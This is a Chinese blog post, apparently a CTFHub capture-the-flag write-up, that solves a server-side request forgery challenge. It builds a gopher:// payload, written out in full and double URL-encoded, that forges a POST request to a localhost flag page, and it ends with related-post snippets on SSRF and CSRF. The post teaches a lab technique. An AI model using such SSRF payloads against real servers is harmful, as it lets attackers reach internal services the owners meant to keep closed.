SSRF服务端请求伪造漏洞——POST请求

原创 于 2024-10-31 23:53:38 发布 · 655 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#SSRF #CTF技能树 #CTF题目 #网络安全 #web安全 #经验分享

初见页面:

点击链接后,页面显示如下:

一片空白,还是直接访问一下http://127.0.0.1/flag.php,发现界面突然多了个搜索框

右键查看页面源代码:

发现多了个key值,复制粘贴到搜索框并回车一下

得到提示:只允许从127.0.0.1访问

尝试使用Gopher协议向服务器发送POST包,但是现在没有提交按钮,所以需要自己构造POST请求,用python脚本来构造Gopher协议的payload:

构造payload:

/?url=gopher%3A//127.0.0.1%3A80/_POSTxxxxxxxx

这样就得到flag了,当然还有另一种手工修改的,不过比较麻烦,拿之前手工做过的例子讲解一下

还是差不多的模版,经过URL编码后,复制结果到word文档中,用替换功能将文本里的%0a%全部替换成%0D%0A

POST%20/flag.php%20HTTP/1.1%0D%0AHost:%20127.0.0.1:80%0D%0AContent-Length:%2036%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Akey=526cfc11b4df24a4042fedaba0cc812b

再进行二次URL编码:

构造payload:

/?url=gopher://127.0.0.1:80/_POST%2520/flag.php%2520HTTP/1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Length:%252036%250D%250AContent-Type:%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey=526cfc11b4df24a4042fedaba0cc812b

一样可以得到flag

漏洞挖掘】——105、POST注入深入剖析
Fly_鹏程万里
06-21 237
POST是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如:我们常常使用的用户登录模块、网站的留言板模块等,在这些功能模块中我们提交的数据都是以POST的方式提交的服务器后再由服务器端进行验证,如果以POST提交的参数存在注入点,那么将这种注入称之为"POST"注入。
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1638
ctfhub ssrf post小记
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4303
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
SSRF POST请求 上传文件 FastCGI协议 Redis协议
qq_69100706的博客
08-12 816
SSRF(Server-Side Request Forgery,服务器侧请求伪造)攻击经常被用于探索和利用后端服务的漏洞,包括通过POST请求上传文件,以及滥用FastCGI和Redis协议等。
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1404
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
CTFHUB_SSRF_POST请求
m0_58788294的博客
07-29 376
【代码】CTFHUB_SSRF_POST请求
CTFHub技能树笔记之SSRFPOST请求、文件上传
weixin_48799157的博客
04-03 9815
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
SSRF服务端请求伪造漏洞
李同學的安全圈
10-24 1303
SSRF(全称Server-Side Request Forgery),即服务器端请求伪造SSRF是一种由攻击者构造请求服务端发起请求漏洞SSRF攻击的目标是外网无法访问的内部系统(服务端可以请求到与自身相连而与外网隔离的内部系统)。SSRF形成的原因是服务端提供了从其他服务器获取数据的功能,但没有对目标地址做过滤与限制,导致攻击者在服务端从指定URL地址获取内部系统的数据(文件、图片等)。
SSRF服务端请求伪造
saber的博客
10-29 958
全面介绍了服务端请求伪造(SSRF)漏洞及其相关概念、形成原因、危害、检测方法和利用技巧。首先,解释了什么是SSRF,即攻击者通过构造恶意请求,迫使服务器代表攻击者而非正常用户向其他服务器发起请求漏洞。此漏洞通常允许攻击者访问到原本不可见的内部网络资源,从而造成潜在的安全威胁。
SSRF服务端请求伪造——打穿内网
aming小老弟
07-09 99
本次靶场的设计拓扑图 攻击流程,172.72.23.21 这个服务器的 Web 80 端口存在 SSRF 漏洞,并且 80 端口映射到了公网的 8080, 此时攻击者通过这个 8080 端口可以借助 SSRF 漏洞发起对 172 目标内网的探测和攻击。 覆盖了 SSRF 常见的攻击场景, 实际上 SSRF 还可以攻击 ...
web安全】——SSRF服务器端请求伪造
wxh的博客
10-05 1465
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF服务器请求伪造
没有网络安全就没有国家安全
08-20 1046
本篇主要讲解SSRF服务器请求伪造漏洞并复现漏洞和利用,以及如何绕过与防御
SSRF 服务端请求伪造
dichu8371的博客
10-12 458
SSRF 服务端请求伪造 SSRF 简介¶ SSRF,Server-Side Request Forgery,服务端请求伪造,是一种由攻击者构造形成由服务器端发起请求的一个漏洞。一般情况下,SSRF 攻击的目标是从外网无法访问的内部系统。 漏洞形成的原因大多是因为服务端提供了从其他服务器应用获取数据的功能且没有对目标地址作过滤和限制。 攻击者可以利用 SSRF 实现的攻击...
SSRF-服务器端请求伪造
Echo__h的博客
06-12 269
1.概述SSRF(Server-Side Request Fogery),服务器端请求伪造。是一种由攻击者构造请求,由服务器端发送请求漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统。2.原理其形成的原因大都是由于服务器提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格的过滤和限制。简单来说就是攻击者利用服务器漏洞以服务器的身份发送一条构造好的恶意请求给服务器所在内网进行攻击。找了一个大师傅画的图,方便理解。
SSRF(2)
cyy001128的博客
06-19 920
Fastcgi协议由多个record组成,record也有header和body一说,服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端,语言后端解码以后拿到具体数据,进行指定操作,并将结果再按照该协议封装好后返回给服务器中间件。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。
CTFHub-SSRF---(Post请求/上传文件/FastCGI/Redis/URL/数字IP/302跳转/DNS重绑定 Bypass)
Wking
08-17 3335
SSRF相关题目实战
ctfhub-web-ssrf-POST请求
m0_52484587的博客
08-29 1187
在使用 Gopher协议发送 POST请求包时,Host、Content-Type和Content-Length请求头是必不可少的,但在 GET请求中可以没有。在向服务器发送请求时,首先浏览器会进行一次 URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次 URL解码。这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.加油吧骚年。我们尝试通过file协议读取index.php 和flag.php的页面源码。发送POST请求,得到flag。
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 798
CTFHUB靶场技能树-SSRF-POST请求的通关教程
CTFHUB技能树-SSRF【持续更新】
热门推荐
qq_33295410的博客
09-16 1万+
CTFHUB SSRF POST请求首先开始解题构造gopher数据构造获取flag的请求 POST请求 最近ctfhub新添加了一些题目,看到有ssrf题目便去试了一下,前面几个都比较简单就暂时先不写,post 请求那个折腾了几天终于弄懂了,把过程记录下。 首先 我们看下题目描述,这个肯定是不能错过的。 描述:这次是发一个HTTP POST请求.对了.ssrf是用php的curl实现的.并且会跟踪302跳转.我准备了一个302.php,可能对你有用哦 开始解题 我们打开题目,发现了flag.php 3
登录页一般会存在ssrf和csrf漏洞
最新发布
03-15
### 登录页面中的SSRF和CSRF漏洞分析及其防护措施 #### SSRF漏洞分析 SSRF(Server-Side Request Forgery),即服务端请求伪造,是一种通过欺骗服务器向指定地址发送请求的攻击方式。这种漏洞通常发生在应用程序允许用户输入URL或其他网络资源路径的情况下[^1]。如果登录页面存在未经过滤或验证的功能模块(如重定向功能、API调用接口等),可能会成为SSRF攻击的目标。 对于SSRF漏洞,在登录页面上可能存在的情况包括但不限于以下几点: - 如果登录逻辑涉及外部服务调用(例如OAuth认证流程中与第三方平台交互),而这些调用缺乏严格的白名单机制,则可能导致SSRF风险。 - 攻击者可以利用此漏洞扫描内部IP地址空间或者尝试访问受限于防火墙保护的服务实例[^4]。 为了有效检测并防止此类问题发生,建议采取如下策略: - **严格限定可访问范围**:仅允许已知安全域内的连接操作;实施基于正则表达式的过滤器来匹配合法域名结构[^3]。 - **隔离敏感环境**:确保生产环境中任何对外暴露的应用程序都不具备直接通往私有子网的能力[^2]。 #### CSRF漏洞分析 CSRF (Cross-site request forgery),跨站请求伪造是指攻击者诱使受害者在其已经登录的状态下执行非预期动作的一种威胁形式。尽管传统意义上的CSRF更常见于那些修改数据状态的动作(像转账交易之类的行为),但在某些特殊场景里,即便是简单的GET请求也可能带来潜在危害——特别是当它们能够泄露隐私信息时[^5]。 针对登录界面而言,虽然大多数情况下它本身不会直接受到CSRF的影响(因为尚未完成身份验证过程之前不存在有效的会话凭证可供滥用)。然而需要注意的是,如果网站设计不当,使得预加载阶段就携带了过多不必要的Cookie或者其他持久化标志符的话,那么即使是在初次进入站点的过程中也有可能遭遇类似的隐患。 以下是几种推荐用来抵御CSRF的方法: - 使用一次性Token作为附加参数嵌入表单提交过程中,并由后台校验其有效性; - 对所有POST类型的HTTP请求增加额外的身份确认步骤,比如重新询问密码或者是显示验证码图像让用户填写正确答案后再继续处理后续业务逻辑; - 设置恰当的安全头部选项,例如`X-Frame-Options`, `Content Security Policy`(CSP)等等,从而减少被框架劫持的风险概率。 ```python # 示例代码展示如何生成随机数token用于CSRF防护 import secrets def generate_csrf_token(): return secrets.token_hex(16) csrf_token = generate_csrf_token() print(csrf_token) ``` 上述Python片段展示了创建一个强健且难以预测的字符串序列的过程,该串可以在每次渲染HTML文档前分配给客户端保存起来以便稍后回传至服务器做进一步核对之用。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值